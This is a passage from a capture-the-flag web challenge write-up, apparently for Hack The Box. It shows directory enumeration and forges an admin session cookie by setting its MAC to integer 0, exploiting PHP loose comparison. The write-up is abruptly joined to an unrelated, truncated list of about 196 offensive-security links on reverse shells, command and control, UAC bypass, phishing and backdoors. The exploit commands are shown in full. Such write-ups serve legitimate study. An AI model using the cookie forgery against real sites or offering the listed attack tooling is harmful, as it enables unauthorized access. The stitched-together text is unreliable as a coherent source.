<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access / on this server.<br />
</p>
<hr>
<address>Apache/2.4.18 (Ubuntu) Server at 88.198.233.174 Port 37337</address>
</body></html>
</RESPONSE>
```
### ENUMERATE
Well, if we don't have permission to hit `/`, then we need to enumerate our way
to another access point..
```
$ dirb http://88.198.233.174:37337 /usr/share/wordlists/dirb/small.txt -w
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Dec 27 02:44:35 2017
URL_BASE: http://88.198.233.174:37337/
WORDLIST_FILES: /usr/share/wordlists/dirb/small.txt
OPTION: Not Stopping on warning messages
-----------------
GENERATED WORDS: 959
---- Scanning URL: http://88.198.233.174:37337/ ----
(!) WARNING: All responses for this directory seem to be CODE = 403.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Wed Dec 27 02:52:09 2017
DOWNLOADED: 959 - FOUND: 0
```
```
$ gobuster -e -u 88.198.233.174:37337 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Gobuster v1.2 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://88.198.233.174:37337/
[+] Threads : 10
[+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 204,301,302,307,200
[+] Expanded : true
=====================================================
```
```
$ wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/megabeast.txt --hs Forbi http://88.198.233.174:37337/FUZZ.php
```
.. so this doesn't get us anywhere.
### POST REQUEST?
What if instead of doing a GET request, we turned it into a POST request?
```
http://www.restapitutorial.com/lessons/httpmethods.html
```
```
$ wget http://88.198.233.174:37337
--2017-12-27 02:54:18-- http://88.198.233.174:37337/
Connecting to 88.198.233.174:37337... connected.
HTTP request sent, awaiting response... 403 Forbidden
2017-12-27 02:54:19 ERROR 403: Forbidden.
$ wget --post-data "username=mytest" http://88.198.233.174:37337
--2017-12-27 02:55:22-- http://88.198.233.174:37337/
Connecting to 88.198.233.174:37337... connected.
HTTP request sent, awaiting response... 403 Forbidden
2017-12-27 02:55:23 ERROR 403: Forbidden.
```
Hitting `/` with the `POST` request didn't yield anything, but hitting
`index.php` did!
```
$ wget --post-data "username=mytest" http://88.198.233.174:37337/index.php
--2018-01-13 23:05:05-- http://88.198.233.174:37337/index.php
Connecting to 88.198.233.174:37337... connected.
HTTP request sent, awaiting response... 200 OK
Length: 274 [text/html]
Saving to: ‘index.php’
index.php 100%[===================>] 274 --.-KB/s in 0s
2018-01-13 23:05:06 (40.0 MB/s) - ‘index.php’ saved [382]
```
```
$ cat index.php
<html>
<body>
<form action="index.php" method="post">
Change Username: <br>
<input type="text" name="fuckhtml" placeholder="notimportant">
<!-- HTB hint:really not important...totaly solvable without using it! Just there to fill things and to save you from some trouble you might get into :) -->
<input type="submit" value="Change">
</form>
</body>
</html>
not an admin (yet)
```
<img src="index_php.jpg" width=500px/>
Let's take a closer look at the server response to our POST request using
`Postman`..
<img src="postman-index_php.jpg" width=500px/>
<img src="postman-index_php_headers.jpg" width=500px/>
```
<RESPONSE>
Content-Encoding: gzip
Content-Length: 274
Content-Type: text/html; charset=UTF-8
Date: Sun, 14 Jan 2018 04:41:35 GMT
Server: Apache/2.4.18 (Ubuntu)
Set-Cookie: ses=eyJVc2VyIjoid2hvY2FyZXMiLCJBZG1pbiI6IkZhbHNlIiwiTUFDIjoiZmY2ZDBhNTY4ZDYxZTVhMDNiY2RiMDQ1MDlkNTg4NWQifQ%3D%3D
Vary: Accept-Encoding
<html>
<body>
<form action="index.php" method="post">
Change Username: <br>
<input type="text" name="fuckhtml" placeholder="notimportant">
<!-- HTB hint:really not important...totaly solvable without using it! Just there to fill things and to save you from some trouble you might get into :) -->
<input type="submit" value="Change">
</form>
</body>
</html>
not an admin (yet)
</RESPONSE>
```
Interesting.. so there is a cookie that is also returned which always appears to
be the same value even for subsequent POST requests.
### C IS FOR COOKIE
Let's see if we can decode this cookie..
```
ORIGINAL
ses=eyJVc2VyIjoid2hvY2FyZXMiLCJBZG1pbiI6IkZhbHNlIiwiTUFDIjoiZmY2ZDBhNTY4ZDYxZTVhMDNiY2RiMDQ1MDlkNTg4NWQifQ%3D%3D
```
```
URL DECODED
ses=eyJVc2VyIjoid2hvY2FyZXMiLCJBZG1pbiI6IkZhbHNlIiwiTUFDIjoiZmY2ZDBhNTY4ZDYxZTVhMDNiY2RiMDQ1MDlkNTg4NWQifQ==
```
```
BASE64 DECODED
$ echo "eyJVc2VyIjoid2hvY2FyZXMiLCJBZG1pbiI6IkZhbHNlIiwiTUFDIjoiZmY2ZDBhNTY4ZDYxZTVhMDNiY2RiMDQ1MDlkNTg4NWQifQ==" | base64 -D
{"User":"whocares","Admin":"False","MAC":"ff6d0a568d61e5a03bcdb04509d5885d"}
```
Hm.. is it as simple as manipulating the "Admin" flag and sending the cookie
as part of the POST request?
### NEW COOKIE (ADMIN:TRUE)
Let's try crafting a new cookie with the "Admin" flag flipped to "True" and see
what happens.
```
BASE64 ENCODED
$ echo "{"User":"whocares","Admin":"True","MAC":"ff6d0a568d61e5a03bcdb04509d5885d"}" | base64
e1VzZXI6d2hvY2FyZXMsQWRtaW46VHJ1ZSxNQUM6ZmY2ZDBhNTY4ZDYxZTVhMDNiY2RiMDQ1MDlkNTg4NWR9Cg==
```
```
URL ENCODED COOKIE
ses=e1VzZXI6d2hvY2FyZXMsQWRtaW46VHJ1ZSxNQUM6ZmY2ZDBhNTY4ZDYxZTVhMDNiY2RiMDQ1MDlkNTg4NWR9Cg%3D%3D
```
<img src="postman-cookie_mod1.jpg" width=500px/>
Ooooh.. we got a different message this time!
```
you've fucked something up
```
Looking more closely at the generated cookie value, I realized that I was
encoding a newline at the end and I shouldn't be. Trying the above steps again
with the newline-free cookie we get a different error message!
```
$ echo -n '{"User":"whocares","Admin":"True","MAC":"ff6d0a568d61e5a03bcdb04509d5885d"}' | base64
eyJVc2VyIjoid2hvY2FyZXMiLCJBZG1pbiI6IlRydWUiLCJNQUMiOiJmZjZkMGE1NjhkNjFlNWEwM2JjZGIwNDUwOWQ1ODg1ZCJ9
```
<img src="postman-cookie_mod1a.jpg" width=500px/>
```
what are you trying to do huh?
```
### NEW COOKIE II (USER:ADMIN, ADMIN:TRUE)
Let's play with the "User" flag as well?
```
$ echo -n '{"User":"Admin","Admin":"True","MAC":"ff6d0a568d61e5a03bcdb04509d5885d"}' | base64
eyJVc2VyIjoiQWRtaW4iLCJBZG1pbiI6IlRydWUiLCJNQUMiOiJmZjZkMGE1NjhkNjFlNWEwM2JjZGIwNDUwOWQ1ODg1ZCJ9
```
```
URL ENCODED COOKIE
ses=eyJVc2VyIjoiQWRtaW4iLCJBZG1pbiI6IlRydWUiLCJNQUMiOiJmZjZkMGE1NjhkNjFlNWEwM2JjZGIwNDUwOWQ1ODg1ZCJ9
```
Hm.. still the same "what are you trying to do huh?" response as when we just
fiddled with the `Admin` flag.
### NEW COOKIE III (USER:ADMIN, ADMIN:TRUE, MAC:???)
Okay. so it looks like we need to fool the MAC field?
```
https://en.wikipedia.org/wiki/Hash-based_message_authentication_code
In cryptography, a keyed-hash message authentication code (HMAC) is a specific
type of message authentication code (MAC) involving a cryptographic hash
function and a secret cryptographic key. It may be used to simultaneously verify
both the data integrity and the authentication of a message, as with any MAC.
```
Researching around (i.e. Google), came across the topic of `type juggling`
with `PHP` that might be interesting to try..
```
Laravel Cryptographic MAC Bypass
https://www.owasp.org/images/6/6b/PHPMagicTricks-TypeJuggling.pdf
A Laravel "encryption payload" looks like this:
{
"iv": "137f87545d8d2f994c65a6f336507747",
"value": "c30fbe54e025b2a509db7a1fc174783c35d023199f9a0e24ae23a934277aec66"
"mac": "68f6611d14aa021a80c3fc09c638de6de12910486c0c82703315b5d83b8229bb",
}
The MAC check code looked like this:
$payload = json_decode(base64_decode($payload), true);
if ($payload['mac'] != hash_hmac('sha256', $payload['value'], $this->key))
throw new DecryptException("MAC for payload is invalid.");
The calculated MAC (i.e. the result of hash_hmac()) is a string containing
hexadecimal characters.
The use of a loose comparison means that if an integer was provided in the JSON
payload, the HMAC string will be juggled to a number
- "7a5c2...72c933" == int(7)
- "68f66...8229bb" == int(68)
- "092d1...c410a9" == int(92)
If the calculated MAC is "68f66...8229bb" then the following payload will pass
the MAC check:
{
"iv": "137f87545d8d2f994c65a6f336507747",
"value": "c30fbe54e025b2a509db7a1fc174783c35d023199f9a0e24ae23a934277aec66"
"mac": 68,
}
The MAC bug allows an attacker to submit arbitrary ciphertexts and IV's which
are processed by the server in CBC mode.
```
So let's try changing the `MAC` field to an integer instead of a string to see
if the validation code is vulnerable to "loose comparison".. but what integer
to use?
<img src="php-loose-comparison-table.jpg" width=500px/>
If the MAC field is a string, the table appears to suggest that `if ("str"==0)`
would resolve to `true`, so if we feed in a MAC of `0`.. would that make the
comparison always work?
```
$ echo '{"User":"Admin","Admin":"True","MAC":0}' | base64
eyJVc2VyIjoiQWRtaW4iLCJBZG1pbiI6IlRydWUiLCJNQUMiOjB9Cg==
```
```
URL ENCODED
ses=eyJVc2VyIjoiQWRtaW4iLCJBZG1pbiI6IlRydWUiLCJNQUMiOjB9Cg%3D%3D
```
<img src="postman-cookie_mod3.jpg" width=500px/>
.. weeeeeeeeeeeeeeeeeeeeee.... that worked!
|
-1- 3 Ways Extract Password Hashes from NTDS.dit:
https://www.hackingarticles.in/3-ways-extract-password-hashes-from-ntds-dit
-2- 3 ways to Capture HTTP Password in Network PC:
https://www.hackingarticles.in/3-ways-to-capture-http-password-in-network-pc/
-3- 3 Ways to Crack Wifi using Pyrit,oclHashcat and Cowpatty:
www.hackingarticles.in/3-ways-crack-wifi-using-pyrit-oclhashcat-cowpatty/
-4-BugBounty @ Linkedln-How I was able to bypass Open Redirection Protection:
https://medium.com/p/2e143eb36941
-5-BugBounty — “Let me reset your password and login into your account “-How I was able to Compromise any User Account via Reset Password Functionality:
https://medium.com/p/a11bb5f863b3/share/twitter
-6-“Journey from LFI to RCE!!!”-How I was able to get the same in one of the India’s popular property buy/sell company:
https://medium.com/p/a69afe5a0899
-7-BugBounty — “I don’t need your current password to login into your account” - How could I completely takeover any user’s account in an online classi ed ads company:
https://medium.com/p/e51a945b083d
-8-BugBounty — “How I was able to shop for free!”- Payment Price Manipulation:
https://medium.com/p/b29355a8e68e
-9-Recon — my way:
https://medium.com/p/82b7e5f62e21
-10-Reconnaissance: a eulogy in three acts:
https://medium.com/p/7840824b9ef2
-11-Red-Teaming-Toolkit:
https://github.com/infosecn1nja/Red-Teaming-Toolkit
-12-Red Team Tips:
https://vincentyiu.co.uk/
-13-Shellcode: A reverse shell for Linux in C with support for TLS/SSL:
https://modexp.wordpress.com/2019/04/24/glibc-shellcode/
-14-Shellcode: Encrypting traffic:
https://modexp.wordpress.com/2018/08/17/shellcode-encrypting-traffic/
-15-Penetration Testing of an FTP Server:
https://medium.com/p/19afe538be4b
-16-Reverse Engineering of the Anubis Malware — Part 1:
https://medium.com/p/741e12f5a6bd
-17-Privilege Escalation on Linux with Live examples:
https://resources.infosecinstitute.com/privilege-escalation-linux-live-examples/
-18-Pentesting Cheatsheets:
https://ired.team/offensive-security-experiments/offensive-security-cheetsheets
-19-Powershell Payload Delivery via DNS using Invoke-PowerCloud:
https://ired.team/offensive-security-experiments/payload-delivery-via-dns-using-invoke-powercloud
-20-SMART GOOGLE SEARCH QUERIES TO FIND VULNERABLE SITES – LIST OF 4500+ GOOGLE DORKS:
https://sguru.org/ghdb-download-list-4500-google-dorks-free/
-21-SQL Injection Cheat Sheet:
https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/
-22-SQLmap’s os-shell + Backdooring website with Weevely:
https://medium.com/p/8cb6dcf17fa4
-23-SQLMap Tamper Scripts (SQL Injection and WAF bypass) Tips:
https://medium.com/p/c5a3f5764cb3
-24-Top 10 Essential NMAP Scripts for Web App Hacking:
https://medium.com/p/c7829ff5ab7
-25-BugBounty — How I was able to download the Source Code of India’s Largest Telecom Service Provider including dozens of more popular websites!:
https://medium.com/p/52cf5c5640a1
-26-Re ected XSS Bypass Filter:
https://medium.com/p/de41d35239a3
-27-XSS Payloads, getting past alert(1):
https://medium.com/p/217ab6c6ead7
-28-XS-Searching Google’s bug tracker to find out vulnerable source code Or how side-channel timing attacks aren’t that impractical:
https://medium.com/p/50d8135b7549
-29-Web Application Firewall (WAF) Evasion Techniques:
https://medium.com/@themiddleblue/web-application-firewall-waf-evasion-techniques
-30-OSINT Resources for 2019:
https://medium.com/p/b15d55187c3f
-31-The OSINT Toolkit:
https://medium.com/p/3b9233d1cdf9
-32-OSINT : Chasing Malware + C&C Servers:
https://medium.com/p/3c893dc1e8cb
-33-OSINT tool for visualizing relationships between domains, IPs and email addresses:
https://medium.com/p/94377aa1f20a
-34-From OSINT to Internal – Gaining Access from outside the perimeter:
https://www.n00py.io/.../from-osint-to-internal-gaining-access-from-the-outside-the-perimeter
-35-Week in OSINT #2018–35:
https://medium.com/p/b2ab1765157b
-36-Week in OSINT #2019–14:
https://medium.com/p/df83f5b334b4
-37-Instagram OSINT | What A Nice Picture:
https://medium.com/p/8f4c7edfbcc6
-38-awesome-osint:
https://github.com/jivoi/awesome-osint
-39-OSINT_Team_Links:
https://github.com/IVMachiavelli/OSINT_Team_Links
-40-Open-Source Intelligence (OSINT) Reconnaissance:
https://medium.com/p/75edd7f7dada
-41-Hacking Cryptocurrency Miners with OSINT Techniques:
https://medium.com/p/677bbb3e0157
-42-A penetration tester’s guide to sub- domain enumeration:
https://blog.appsecco.com/a-penetration-testers-guide-to-sub-domain-enumeration-7d842d5570f6?gi=f44ec9d8f4b5
-43-Packages that actively seeks vulnerable exploits in the wild. More of an umbrella group for similar packages:
https://blackarch.org/recon.html
-44-What tools I use for my recon during BugBounty:
https://medium.com/p/ec25f7f12e6d
-45-Command and Control – DNS:
https://pentestlab.blog/2017/09/06/command-and-control-dns/
-46-Command and Control – WebDAV:
https://pentestlab.blog/2017/09/12/command-and-control-webdav/
-47-Command and Control – Twitter:
https://pentestlab.blog/2017/09/26/command-and-control-twitter/
-48-Command and Control – Kernel:
https://pentestlab.blog/2017/10/02/command-and-control-kernel/
-49-Source code disclosure via exposed .git folder:
https://pentester.land/tutorials/.../source-code-disclosure-via-exposed-git-folder.html
-50-Pentesting Cheatsheet:
https://hausec.com/pentesting-cheatsheet/
-51-Windows Userland Persistence Fundamentals:
https://www.fuzzysecurity.com/tutorials/19.html
-52-A technique that a lot of SQL injection beginners don’t know | Atmanand Nagpure write-up:
https://medium.com/p/abdc7c269dd5
-53-awesome-bug-bounty:
https://github.com/djadmin/awesome-bug-bounty
-54-dostoevsky-pentest-notes:
https://github.com/dostoevskylabs/dostoevsky-pentest-notes
-55-awesome-pentest:
https://github.com/enaqx/awesome-pentest
-56-awesome-windows-exploitation:
https://github.com/enddo/awesome-windows-exploitation
-57-awesome-exploit-development:
https://github.com/FabioBaroni/awesome-exploit-development
-58-BurpSuit + SqlMap = One Love:
https://medium.com/p/64451eb7b1e8
-59-Crack WPA/WPA2 Wi-Fi Routers with Aircrack-ng and Hashcat:
https://medium.com/p/a5a5d3ffea46
-60-DLL Injection:
https://pentestlab.blog/2017/04/04/dll-injection
-61-DLL Hijacking:
https://pentestlab.blog/2017/03/27/dll-hijacking
-62-My Recon Process — DNS Enumeration:
https://medium.com/p/d0e288f81a8a
-63-Google Dorks for nding Emails, Admin users etc:
https://d4msec.wordpress.com/2015/09/03/google-dorks-for-finding-emails-admin-users-etc
-64-Google Dorks List 2018:
https://medium.com/p/fb70d0cbc94
-65-Hack your own NMAP with a BASH one-liner:
https://medium.com/p/758352f9aece
-66-UNIX / LINUX CHEAT SHEET:
cheatsheetworld.com/programming/unix-linux-cheat-sheet/
-67-Linux Capabilities Privilege Escalation via OpenSSL with SELinux Enabled and Enforced:
https://medium.com/p/74d2bec02099
-68- information gathering:
https://pentestlab.blog/category/information-gathering/
-69-post exploitation:
https://pentestlab.blog/category/post-exploitation/
-70-privilege escalation:
https://pentestlab.blog/category/privilege-escalation/
-71-red team:
https://pentestlab.blog/category/red-team/
-72-The Ultimate Penetration Testing Command Cheat Sheet for Linux:
https://www.hackingloops.com/command-cheat-sheet-for-linux/
-73-Web Application Penetration Testing Cheat Sheet:
https://jdow.io/blog/2018/03/18/web-application-penetration-testing-methodology/
-74-Windows Kernel Exploits:
https://pentestlab.blog/2017/04/24/windows-kernel-exploits
-75-Windows oneliners to download remote payload and execute arbitrary code:
https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/
-76-Windows-Post-Exploitation:
https://github.com/emilyanncr/Windows-Post-Exploitation
-77-Windows Post Exploitation Shells and File Transfer with Netcat for Windows:
https://medium.com/p/a2ddc3557403
-78-Windows Privilege Escalation Fundamentals:
https://www.fuzzysecurity.com/tutorials/16.html
-79-Windows Privilege Escalation Guide:
www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
-80-Windows Active Directory Post Exploitation Cheatsheet:
https://medium.com/p/48c2bd70388
-81-Windows Exploitation Tricks: Abusing the User-Mode Debugger:
https://googleprojectzero.blogspot.com/2019/04/windows-exploitation-tricks-abusing.html
-82-VNC Penetration Testing (Port 5901):
http://www.hackingarticles.in/vnc-penetration-testing
-83- Big List Of Google Dorks Hacking:
https://xspiyr.wordpress.com/2012/09/05/big-list-of-google-dorks-hacking
-84-List of google dorks for sql injection:
https://deadlyhacker.wordpress.com/2013/05/09/list-of-google-dorks-for-sql-injection/
-85-Download Google Dorks List 2019:
https://medium.com/p/323c8067502c
-86-Comprehensive Guide to Sqlmap (Target Options):
http://www.hackingarticles.in/comprehensive-guide-to-sqlmap-target-options15249-2
-87-EMAIL RECONNAISSANCE AND PHISHING TEMPLATE GENERATION MADE SIMPLE:
www.cybersyndicates.com/.../email-reconnaissance-phishing-template-generation-made-simple
-88-Comprehensive Guide on Gobuster Tool:
https://www.hackingarticles.in/comprehensive-guide-on-gobuster-tool/
-89-My Top 5 Web Hacking Tools:
https://medium.com/p/e15b3c1f21e8
-90-[technical] Pen-testing resources:
https://medium.com/p/cd01de9036ad
-91-File System Access on Webserver using Sqlmap:
http://www.hackingarticles.in/file-system-access-on-webserver-using-sqlmap
-92-kali-linux-cheatsheet:
https://github.com/NoorQureshi/kali-linux-cheatsheet
-93-Pentesting Cheatsheet:
https://anhtai.me/pentesting-cheatsheet/
-94-Command Injection Exploitation through Sqlmap in DVWA (OS-cmd):
http://www.hackingarticles.in/command-injection-exploitation-through-sqlmap-in-dvwa
-95-XSS Payload List - Cross Site Scripting Vulnerability Payload List:
https://www.kitploit.com/2018/05/xss-payload-list-cross-site-scripting.html
-96-Analyzing CVE-2018-6376 – Joomla!, Second Order SQL Injection:
https://www.notsosecure.com/analyzing-cve-2018-6376/
-97-Exploiting Sql Injection with Nmap and Sqlmap:
http://www.hackingarticles.in/exploiting-sql-injection-nmap-sqlmap
-98-awesome-malware-analysis:
https://github.com/rshipp/awesome-malware-analysis
-99-Anatomy of UAC Attacks:
https://www.fuzzysecurity.com/tutorials/27.html
-100-awesome-cyber-skills:
https://github.com/joe-shenouda/awesome-cyber-skills
-101-5 ways to Banner Grabbing:
http://www.hackingarticles.in/5-ways-banner-grabbing
-102-6 Ways to Hack PostgresSQL Login:
http://www.hackingarticles.in/6-ways-to-hack-postgressql-login
-103-6 Ways to Hack SSH Login Password:
http://www.hackingarticles.in/6-ways-to-hack-ssh-login-password
-104-10 Free Ways to Find Someone’s Email Address:
https://medium.com/p/e6f37f5fe10a
-105-USING A SCF FILE TO GATHER HASHES:
https://1337red.wordpress.com/using-a-scf-file-to-gather-hashes
-106-Hack Remote Windows PC using DLL Files (SMB Delivery Exploit):
http://www.hackingarticles.in/hack-remote-windows-pc-using-dll-files-smb-delivery-exploit
107-Hack Remote Windows PC using Office OLE Multiple DLL Hijack Vulnerabilities:
http://www.hackingarticles.in/hack-remote-windows-pc-using-office-ole-multiple-dll-hijack-vulnerabilities
-108-BUG BOUNTY HUNTING (METHODOLOGY , TOOLKIT , TIPS & TRICKS , Blogs):
https://medium.com/p/ef6542301c65
-109-How To Perform External Black-box Penetration Testing in Organization with “ZERO” Information:
https://gbhackers.com/external-black-box-penetration-testing
-110-A Complete Penetration Testing & Hacking Tools List for Hackers & Security Professionals:
https://gbhackers.com/hacking-tools-list
-111-Most Important Considerations with Malware Analysis Cheats And Tools list:
https://gbhackers.com/malware-analysis-cheat-sheet-and-tools-list
-112-Awesome-Hacking:
https://github.com/Hack-with-Github/Awesome-Hacking
-113-awesome-threat-intelligence:
https://github.com/hslatman/awesome-threat-intelligence
-114-awesome-yara:
https://github.com/InQuest/awesome-yara
-115-Red-Team-Infrastructure-Wiki:
https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki
-116-awesome-pentest:
https://github.com/enaqx/awesome-pentest
-117-awesome-cyber-skills:
https://github.com/joe-shenouda/awesome-cyber-skills
-118-pentest-wiki:
https://github.com/nixawk/pentest-wiki
-119-awesome-web-security:
https://github.com/qazbnm456/awesome-web-security
-120-Infosec_Reference:
https://github.com/rmusser01/Infosec_Reference
-121-awesome-iocs:
https://github.com/sroberts/awesome-iocs
-122-blackhat-arsenal-tools:
https://github.com/toolswatch/blackhat-arsenal-tools
-123-awesome-social-engineering:
https://github.com/v2-dev/awesome-social-engineering
-124-Penetration Testing Framework 0.59:
www.vulnerabilityassessment.co.uk/Penetration%20Test.html
-125-Penetration Testing Tools Cheat Sheet :
https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/
-126-SN1PER – A Detailed Explanation of Most Advanced Automated Information Gathering & Penetration Testing Tool:
https://gbhackers.com/sn1per-a-detailed-explanation-of-most-advanced-automated-information-gathering-penetration-testing-tool
-127-Spear Phishing 101:
https://blog.inspired-sec.com/archive/2017/05/07/Phishing.html
-128-100 ways to discover (part 1):
https://sylarsec.com/2019/01/11/100-ways-to-discover-part-1/
-129-Comprehensive Guide to SSH Tunnelling:
http://www.hackingarticles.in/comprehensive-guide-to-ssh-tunnelling/
-130-Capture VNC Session of Remote PC using SetToolkit:
http://www.hackingarticles.in/capture-vnc-session-remote-pc-using-settoolkit/
-131-Hack Remote PC using PSEXEC Injection in SET Toolkit:
http://www.hackingarticles.in/hack-remote-pc-using-psexec-injection-set-toolkit/
-132-Denial of Service Attack on Network PC using SET Toolkit:
http://www.hackingarticles.in/denial-of-service-attack-on-network-pc-using-set-toolkit/
-133-Hack Gmail and Facebook of Remote PC using DNS Spoofing and SET Toolkit:
http://www.hackingarticles.in/hack-gmail-and-facebook-of-remote-pc-using-dns-spoofing-and-set-toolkit/
-134-Hack Any Android Phone with DroidJack (Beginner’s Guide):
http://www.hackingarticles.in/hack-android-phone-droidjack-beginners-guide/
-135-HTTP RAT Tutorial for Beginners:
http://www.hackingarticles.in/http-rat-tutorial-beginners/
-136-5 ways to Create Permanent Backdoor in Remote PC:
http://www.hackingarticles.in/5-ways-create-permanent-backdoor-remote-pc/
-137-How to Enable and Monitor Firewall Log in Windows PC:
http://www.hackingarticles.in/enable-monitor-firewall-log-windows-pc/
-138-EMPIRE TIPS AND TRICKS:
https://enigma0x3.net/2015/08/26/empire-tips-and-tricks/
-139-CSRF account takeover Explained Automated/Manual:
https://medium.com/p/447e4b96485b
-140-CSRF Exploitation using XSS:
http://www.hackingarticles.in/csrf-exploitation-using-xss
-141-Dumping Domain Password Hashes:
https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/
-142-Empire Post Exploitation – Unprivileged Agent to DA Walkthrough:
https://bneg.io/2017/05/24/empire-post-exploitation/
-143-Dropbox for the Empire:
https://bneg.io/2017/05/13/dropbox-for-the-empire/
-144-Empire without PowerShell.exe:
https://bneg.io/2017/07/26/empire-without-powershell-exe/
-145-REVIVING DDE: USING ONENOTE AND EXCEL FOR CODE EXECUTION:
https://enigma0x3.net/2018/01/29/reviving-dde-using-onenote-and-excel-for-code-execution/
-146-PHISHING WITH EMPIRE:
https://enigma0x3.net/2016/03/15/phishing-with-empire/
-146-BYPASSING UAC ON WINDOWS 10 USING DISK CLEANUP:
https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/
-147-“FILELESS” UAC BYPASS USING EVENTVWR.EXE AND REGISTRY HIJACKING:
https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
-148-“FILELESS” UAC BYPASS USING SDCLT.EXE:
https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/
-149-PHISHING AGAINST PROTECTED VIEW:
https://enigma0x3.net/2017/07/13/phishing-against-protected-view/
-150-LATERAL MOVEMENT USING EXCEL.APPLICATION AND DCOM:
https://enigma0x3.net/2017/09/11/lateral-movement-using-excel-application-and-dcom/
-151-enum4linux Cheat Sheet:
https://highon.coffee/blog/enum4linux-cheat-sheet/
-152-enumeration:
https://technologyredefine.blogspot.com/2017/11/enumeration.html
-153-Command and Control – WebSocket:
https://pentestlab.blog/2017/12/06/command-and-control-websocket
-154-Command and Control – WMI:
https://pentestlab.blog/2017/11/20/command-and-control-wmi
-155-Dangerous Virus For Windows Crashes Everything Hack window Using Virus:
http://thelearninghacking.com/create-virus-hack-windows/
-156-Comprehensive Guide to Nmap Port Status:
http://www.hackingarticles.in/comprehensive-guide-nmap-port-status
-157-Commix – Automated All-in-One OS Command Injection and Exploitation Tool:
https://gbhackers.com/commix-automated-all-in-one-os-command-injection-and-exploitation-tool
-158-Compromising Jenkins and extracting credentials:
https://www.n00py.io/2017/01/compromising-jenkins-and-extracting-credentials/
-159-footprinting:
https://technologyredefine.blogspot.com/2017/09/footprinting_17.html
-160-awesome-industrial-control-system-security:
https://github.com/hslatman/awesome-industrial-control-system-security
-161-xss-payload-list:
https://github.com/ismailtasdelen/xss-payload-list
-162-awesome-vehicle-security:
https://github.com/jaredthecoder/awesome-vehicle-security
-163-awesome-osint:
https://github.com/jivoi/awesome-osint
-164-awesome-python:
https://github.com/vinta/awesome-python
-165-Microsoft Windows - UAC Protection Bypass (Via Slui File Handler Hijack) (Metasploit):
https://www.exploit-db.com/download/44830.rb
-166-nbtscan Cheat Sheet:
https://highon.coffee/blog/nbtscan-cheat-sheet/
-167-neat-tricks-to-bypass-csrfprotection:
www.slideshare.net/0ang3el/neat-tricks-to-bypass-csrfprotection
-168-ACCESSING CLIPBOAR D FROM THE LOC K SC REEN IN WI NDOWS 10 #2:
https://oddvar.moe/2017/01/27/access-clipboard-from-lock-screen-in-windows-10-2/
-169-NMAP CHEAT-SHEET (Nmap Scanning Types, Scanning Commands , NSE Scripts):
https://medium.com/p/868a7bd7f692
-170-Nmap Cheat Sheet:
https://highon.coffee/blog/nmap-cheat-sheet/
-171-Powershell Without Powershell – How To Bypass Application Whitelisting, Environment Restrictions & AV:
https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/
-172-Phishing with PowerPoint:
https://www.blackhillsinfosec.com/phishing-with-powerpoint/
-173-hide-payload-ms-office-document-properties:
https://www.blackhillsinfosec.com/hide-payload-ms-office-document-properties/
-174-How to Evade Application Whitelisting Using REGSVR32:
https://www.blackhillsinfosec.com/evade-application-whitelisting-using-regsvr32/
-175-How to Build a C2 Infrastructure with Digital Ocean – Part 1:
https://www.blackhillsinfosec.com/build-c2-infrastructure-digital-ocean-part-1/
-176-WordPress Penetration Testing using Symposium Plugin SQL Injection:
http://www.hackingarticles.in/wordpress-penetration-testing-using-symposium-plugin-sql-injection
-177-Manual SQL Injection Exploitation Step by Step:
http://www.hackingarticles.in/manual-sql-injection-exploitation-step-step
-178-MSSQL Penetration Testing with Metasploit:
http://www.hackingarticles.in/mssql-penetration-testing-metasploit
-179-Multiple Ways to Get root through Writable File:
http://www.hackingarticles.in/multiple-ways-to-get-root-through-writable-file
-180-MySQL Penetration Testing with Nmap:
http://www.hackingarticles.in/mysql-penetration-testing-nmap
-181-NetBIOS and SMB Penetration Testing on Windows:
http://www.hackingarticles.in/netbios-and-smb-penetration-testing-on-windows
-182-Network Packet Forensic using Wireshark:
http://www.hackingarticles.in/network-packet-forensic-using-wireshark
-183-Escape and Evasion Egressing Restricted Networks:
https://www.optiv.com/blog/escape-and-evasion-egressing-restricted-networks/
-183-Awesome-Hacking-Resources:
https://github.com/vitalysim/Awesome-Hacking-Resources
-184-Hidden directories and les as a source of sensitive information about web application:
https://medium.com/p/84e5c534e5ad
-185-Hiding Registry keys with PSRe ect:
https://posts.specterops.io/hiding-registry-keys-with-psreflect-b18ec5ac8353
-186-awesome-cve-poc:
https://github.com/qazbnm456/awesome-cve-poc
-187-Linux Capabilities Privilege Escalation via OpenSSL with SELinux Enabled and Enforced:
https://medium.com/p/74d2bec02099
-188-Post Exploitation in Windows using dir Command:
http://www.hackingarticles.in/post-exploitation-windows-using-dir-command
189-Web Application Firewall (WAF) Evasion Techniques #2:
https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0
-190-Forensics Investigation of Remote PC (Part 1):
http://www.hackingarticles.in/forensics-investigation-of-remote-pc-part-1
-191-CloudFront Hijacking:
https://www.mindpointgroup.com/blog/pen-test/cloudfront-hijacking/
-192-PowerPoint and Custom Actions:
https://cofense.com/powerpoint-and-custom-actions/
-193-Privilege Escalation on Windows 7,8,10, Server 2008, Server 2012 using Potato:
http://www.hackingarticles.in/privilege-escalation-on-windows-7810-server-2008-server-2012-using-potato
-194-How to intercept TOR hidden service requests with Burp:
https://medium.com/p/6214035963a0
-195-How to Make a Captive Portal of Death:
https://medium.com/p/48e82a1d81a/share/twitter
-196-How to find any CEO’s email address in minutes:
